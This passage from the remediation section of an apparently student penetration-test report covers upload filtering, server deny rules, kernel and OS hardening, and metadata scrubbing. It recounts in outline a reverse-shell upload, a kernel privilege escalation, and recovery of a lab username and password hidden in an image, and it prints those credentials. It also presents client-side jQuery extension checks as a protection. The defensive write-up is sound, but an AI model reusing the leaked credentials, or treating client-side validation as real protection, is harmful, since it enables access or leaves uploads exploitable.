Don't rely only on the file extension (e.g., .jpg.php) as attackers can easily manipulate file names. Use functions that inspect the file's content because in our case we put a reverse shell that give us an access to the machine , so if the content of the uploaded file was inspected, the risk of exploiting the machine will be reduced. For instance, ensure that .php scripts are not uploaded by checking the first few bytes of the file content.

Example in PHP:

$fileContent = file_get_contents($_FILES['fileInput']['tmp_name']); if (strpos($fileContent, '<?php') !== false) { die('File contains PHP code. Upload rejected.'); }

1. Disable Script Execution in Upload Directory

You can configure your server to disallow the execution of any PHP files in the upload directory because in our case when we upload the reverse shell we execute it. If you’re using Apache, for example, you can add this to the .htaccess file:

<FilesMatch "\.(php|phar|phtml)$"> Deny from all </FilesMatch>

For Nginx, you can use the following directive in your configuration:

nginx

location /uploads/ { deny all; location ~ \.php$ { return 403; } }

1. Set Proper File Permissions

Ensure that uploaded files have restrictive permissions so they can't be executed. For example:

chmod 0644 /path/to/uploads/*

1. Integrating with jQuery for Upload Handling

The jQuery backend code will handle the validation and also help prevent malicious file uploads so this can reduce the exploitation of the machine like we did. Here's how you can modify the jQuery code to support secure file upload:

$(document).ready(function () { $('#uploadForm').on('submit', function (e) { let fileInput = $('#fileInput')[0].files[0]; // Check if a file is selected if (!fileInput) { alert('Please select a file to upload.'); e.preventDefault(); return; } // Validate file extension let allowedExtensions = /(\.jpg|\.jpeg|\.png)$/i; if (!allowedExtensions.exec(fileInput.name)) { alert('Invalid file type. Please upload a .jpg or .png file.'); e.preventDefault(); return; } // Optional: File size limit (e.g., 2MB) if (fileInput.size > 2 * 1024 * 1024) { alert('File size exceeds the 2MB limit.'); e.preventDefault(); return; } alert('File validated. Uploading...'); }); });

Steps to Prevent Privilege Escalation:

1. Upgrade the Operating System:

- The Ubuntu 17.04 ( OS of the exploited machine ) reached its end of life (EOL) in January 2018, meaning it no longer receives security updates.

- Action: Upgrade to a currently supported version of Ubuntu (e.g., Ubuntu 22.04 LTS or later).

- Why: Supported versions receive regular updates, patching critical vulnerabilities automatically.

1. Keep the System Updated:

- Regularly apply updates using the following commands:

``` sudo apt update

sudo apt upgrade -y

sudo apt dist-upgrade -y ```

1. Upgrade the Kernel:

The privilege escalation step is performed using kernel exploitation, and this because the kernel is not up to date so it had a potential to be exploited.

Consider upgrading the Linux kernel to a more secure and supported version:

sudo apt install --install-recommends linux-generic-hwe-22.04

1. Implement Security Best Practices:

- Enable Automatic Security Updates:

``` sudo apt install unattended-upgrades

sudo dpkg-reconfigure -plow unattended-upgrades ```

- Limit Privileged Access:

- Review user accounts with administrative privileges.

- Use sudo responsibly and restrict administrative commands.

1. Enable Kernel Hardening:

- Use the following security modules:

- AppArmor: Pre-installed in Ubuntu, enforce it with:

```bash

sudo systemctl enable apparmor

sudo systemctl start apparmor

```

- SELinux: Consider using SELinux for additional protection.

- Enable key kernel protection settings in /etc/sysctl.conf:

```

kernel.randomize_va_space=2 # Enable Address Space Layout Randomization (ASLR)

kernel.kptr_restrict=2 # Hide kernel pointers

```

1. Apply Mandatory Access Control (MAC) Policies:

- Implement restrictive permissions using tools like AppArmor, SELinux, or Grsecurity. So when we need to access anything we need permission and this reduce the potential of taking directly the session like we do in our exploit.

Business Impact

Failing to address outdated operating systems and kernels could lead to severe data breaches, ransomware attacks, and compliance violations. Upgrading ensures a more secure, stable environment with reduced attack surfaces.

Priority: High

Due to the critical nature of kernel exploitation vulnerabilities, immediate action is required to prevent potential compromises.

Preventing Information Leaks from Image Files

1. Avoid Embedding Sensitive Data in Media Files

- Refrain from embedding sensitive data such as credentials, personal details, or secret keys within image files or other media. Instead, use secure storage mechanisms specifically designed for sensitive data like in the exploit machine we use the image OdinHiddenKnowledge.png to gather username and password information so we conclude that the username is: "godofhacking" and the password is: "HusseinBakri"

- Why: Hidden data can be extracted using steganographic analysis tools like zsteg, potentially exposing critical information. ( like we did in the exploit machine)

1. Scrub Metadata Before Sharing Files

- Remove metadata from images using tools such as ExifTool to prevent information leaks, including file creator details, GPS coordinates, and device information.

- Example Command:

exiftool -all= filename.png

- Why: Metadata often contains sensitive information that could be used for reconnaissance or targeted attacks.

1. Use Encryption for Sensitive Data Storage

- If hiding information in files is unavoidable, ensure it is securely encrypted using strong encryption algorithms (e.g., AES-256) and that access is restricted.

- Why: Encryption ensures that even if data is extracted, it cannot be accessed without decryption keys.

1. Conduct Regular Security Assessments

- Perform regular security assessments, including file content analysis, metadata inspection, and steganographic testing, to detect and mitigate potential hidden data leaks. So we prevent that the information leakage again (like in the the exploited machine).

- Why: Continuous monitoring helps identify vulnerabilities before they can be exploited.

1. Employee Awareness and Training

- Educate employees and collaborators about the risks of embedding or inadvertently leaving sensitive information in image files. Include security best practices in onboarding and ongoing training sessions.

- Why: Human error is a leading cause of data exposure. Training reduces this risk by fostering security awareness. Also in the exploited machine it can be a human error that forgot to remove useful information.

Business Impact

Information leaks from image files can lead to data breaches, reputational damage, and regulatory fines if sensitive data is exposed. Implementing the recommended practices helps ensure the privacy and security of critical data shared internally or externally.

Priority: Medium to High

Depending on the nature of the data being shared, this issue can range from moderate to critical. Immediate action is recommended for environments handling sensitive or confidential data.

6- References

• Dr. Hussein Bakri Lecture Notes

• Chatgpt

• https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/

• https://security.paloaltonetworks.com/PAN-SA-2020-0007

• https://terrapin-attack.com/

• https://www.exploit-db.com/search

• https://crackstation.net/

• https://pentestmonkey.net/cheat-sheet/ssh-cheat-sheet

• https://thehackernews.com/2024/11/decades-old-security-vulnerabilities.html

• https://ubuntu.com/security/notices/USN-5355-1

• https://medium.com/@nirvana.elahi/title-llmnr-link-local-multicast-name-resolution-exploring-its-functionality-vulnerabilities-407fb69fb509

• https://privsec.harvard.edu/use-strong-passwords

• https://www.bu.edu/tech/support/information-security/security-for-everyone/how-to-choose-a-strong-password/

• https://www.one.com/en/website-security/create-a-secure-password

• https://docs.kernel.org/security/self-protection.html

• https://www.briskinfosec.com/blogs/blogsdetail/How-hackers-bypass-file-upload-and-how-to-prevent-it-

• https://blog.devsecopsguides.com/file-upload-vulnerabilities

• https://www.exploit-db.com/exploits/42275